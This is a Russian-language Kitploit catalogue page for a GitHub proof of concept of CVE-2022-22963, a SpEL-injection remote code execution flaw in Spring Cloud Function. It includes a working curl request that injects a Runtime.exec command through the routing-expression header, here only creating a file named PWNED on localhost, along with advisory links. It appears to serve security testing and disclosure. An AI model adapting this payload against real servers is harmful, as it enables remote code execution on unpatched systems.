Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/kirill89/cve-2022-22963-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubkirill89/cve-2022-22963-poc

CVE-2022-22963-PoC

Минимальное доказательство концепции для CVE-2022-22963 удаленного выполнения кода в Spring Cloud Function через внедрение SpEL. Демонстрирует эксплуатацию с помощью curl на уязвимом сервере.

Репозиторий
9314 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-22963 RCE PoC

Минимальный пример для воспроизведения удаленного выполнения кода CVE-2022-22963 в org.springframework.cloud:spring-cloud-function-core.

Эксплуатация

Запуск сервера

root@kitploit:~
mvn spring-boot:run

Выполнение запроса

root@kitploit:~
curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch PWNED")' -d xxx http://127.0.0.1:8080/functionRouter

В результате эксплуатации файл PWNED будет создан рядом с pom.xml.

Дополнительная информация

  • Оригинальное уведомление: https://tanzu.vmware.com/security/cve-2022-22963
  • Уведомление Snyk: https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKCLOUD-2436645
  • Этот PoC основан на: https://github.com/Pizz33/Spring-Cloud-Function-SpEL
Скачать инструмент